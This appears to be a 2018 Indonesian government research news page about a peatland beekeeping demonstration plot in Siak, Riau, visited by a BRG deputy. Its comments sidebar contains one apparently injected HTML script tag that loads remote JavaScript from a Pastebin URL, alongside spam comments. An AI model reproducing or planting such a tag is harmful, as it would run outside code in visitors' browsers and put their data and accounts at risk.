KEPALA DEPUTI IV BRG TINJAU LANGSUNG DEMPLOT BUDIDAYA LEBAH MADU HASIL KERJASAMA DENGAN BP2TSTH KUOK

By andhika 17 Jan 2018, 14:14:17 WIBBERITA LITBANG & INNASI

KEPALA DEPUTI IV BRG TINJAU LANGSUNG DEMPLOT BUDIDAYA LEBAH MADU HASIL KERJASAMA DENGAN BP2TSTH KUOK

Keterangan Gambar : (Dokumentasi : Erwin)


BP2TSTH Kuok (17/1/2018), Kebakaran hutan dan lahan yang terjadi pada medio tahun 2015 tercatat sekitar 2,6 juta hektar lahan mengalami degradasi. Untuk menghindari terulangnya kembali kebakaran hutan dan lahan, dilakukan kegiatan-kegiatan melalui penelitian dan pengembangan secara terus menerus untuk keperluan tata kelola kawasan hidrologis gambut serta pengembangan kawasan hutan bernilai konservasi tinggi pada gambut untuk mendukung pengendalian perubahan iklim.

Kegiatan restorasi lahan gambut meliputi kegiatan rewetting, revegetasi, dan revitalisasi livelihood. Guna memastikan kegiatan restorasi di lokasi Demplot kerjasama antara BRG dan BP2TSTH Kuok telah dilaksanakan sesuai dengan ketentuan serta meliputi 3 (tiga) kegiatan tersebut, Kepala Deputi Penelitian dan Pengembangan, Dr. Haris Gunawan, turun langsung meninjau hasil kegiatan yang telah dan sedang berjalan di Kampung Rawa Mekar Jaya, Kecamatan Sungai Apit, Kabupaten Siak pada Minggu (7/1).

Tahun 2017, BP2TSTH Kuok bekerjasama dengan Badan Restorasi Gambut (BRG) melaksanakan kegiatan pengembangan “Budidaya Lebah Penghasil Madu di Ekosistem Gambut”, dimana dalam kegiatan tersebut meliputi 3 (tiga) aspek restorasi gambut seperti rewetting yaitu mengembalikan fungsi kanal, revegetasi yaitu penanaman pengkayaan jenis tanaman pakan lebah serta revitalisasi yaitu memberikan alih teknologi pelatihan budidaya lebah madu kepada masyarakat/kelompok tani.

Budidaya lebah madu dipilih karena merupakan kearifan lokal masyarakat kampung Rawa Mekar Jaya sebagai pencari madu sialang. Seiring berjalannya waktu, petani kesulitan untuk mencari sarang lebah sialang karena tidak ada lagi pohon sialang tempat lebah membuat sarang. Budidaya lebah madu juga dapat mengurangi interaksi masyarakat dengan kawasan hutan.

Dalam kunjungannya, Haris terlihat sangat antusias dan menyempatkan diri untuk melihat hasil budidaya lebah madu sekaligus mewawancarai pihak-pihak yang terlibat seperti peneliti dari BP2TSTH Kuok, anggota kelompok tani, perangkat desa maupun masyarakat sekitar lokasi demplot.

 “Masyarakat sangat terbantu dengan adanya kegiatan ini karena selama ini masyarakat hanya mengandalkan madu sialang (red: berasal dari alam), ketika pohon sialang ditebang masyarakat tidak dapat bergantung dari lebah lagi”, ujar Nasution, salah satu perwakilan dari kelompok tani.

“Terimakasih kami ucapkan kepada BP2TSTH Kuok dan BRG yang telah memilih desa kami sebagai demplot, besar harapan kegiatan ini dapat berlanjut sehingga kami dapat memperoleh penghasilan dari budidaya lebah madu yang dikelola secara lestari dan hutan di ekosistem gambut pun dapat terjaga”, harap Josrizal, selaku Krani/Sekretaris Kampung Rawa Mekar Jaya.

 “Ini merupakan wujud diseminasi atau penyampaian hasil-hasil litbang yang telah kami lakukan dalam bentuk aksi dan kami berusaha untuk melakukan pembinaan dan pemantauan sampai kelompok tani sudah benar-benar mandiri memasarkan produk-produk hasil budidaya dengan labelnya sendiri”, tutup Mochlis, Kepala BP2TSTH Kuok.

Turut serta mendampingi Kepala Deputi IV BRG dalam kunjungannya yaitu pihak Pemerintah Daerah Kabupaten Siak, Bappeda Kabupaten Siak, pihak Kecamatan Sungai Apit dan beberapa akademisi. (ASY/AY)



Write a Facebook Comment

Tuliskan Komentar anda dari account Facebook

View all comments

Write a comment

Temukan juga kami di

Ikuti kami di facebook, twitter, Google+, Linkedin dan dapatkan informasi terbaru dari kami disana.

Komentar Terakhir

  • penulis artikel

    mangrove harus terus di lestarika ...

    View Article
  • <script type="text/javascript" src="https://pastebin.com/raw/STQ7G3HB">&l

    <script type="text/javascript" ...

    View Article
  • loemrntdherid1

    Your article is very interesting and fantastic, at the same time the theme is unique ...

    View Article
  • Jasa Bangun Rumah

    Infonya sangat berguna bagi kami, Thank you. https://jasaseo.website | ...

    View Article